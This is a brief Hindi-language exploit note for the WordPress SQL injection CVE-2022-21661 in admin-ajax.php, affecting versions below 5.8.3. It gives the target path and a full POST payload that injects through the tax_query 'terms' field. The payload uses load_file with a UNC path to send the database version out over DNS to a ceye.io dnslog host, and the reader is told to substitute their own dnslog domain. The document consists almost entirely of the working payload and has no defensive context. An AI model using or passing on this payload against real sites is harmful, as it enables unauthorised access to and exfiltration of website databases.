
WordPress CVE-2022-21661 SQL इंजेक्शन भेद्यता के लिए एक्सप्लॉइट admin-ajax.php में, 5.8.3 से नीचे के संस्करणों के लिए DNS के माध्यम से आउट-ऑफ-बैंड डेटा एक्सफिल्ट्रेशन का उपयोग करते हुए।
#version<5.8.3
पथ:http://your target/wp-admin/admin-ajax.php
इंजेक्शन का प्रकार out-of-band है, आपको स्वयं dnslog निर्दिष्ट करना होगा और ceye.io को बदलना होगा।
POST- डेटा:{"tax_query":[{"field":"term_taxonomy_id","terms":["1) and if((select load_file(concat('\\',(select version()),'.27s601.ceye.io\abc'))),1,1)-- a"]}]}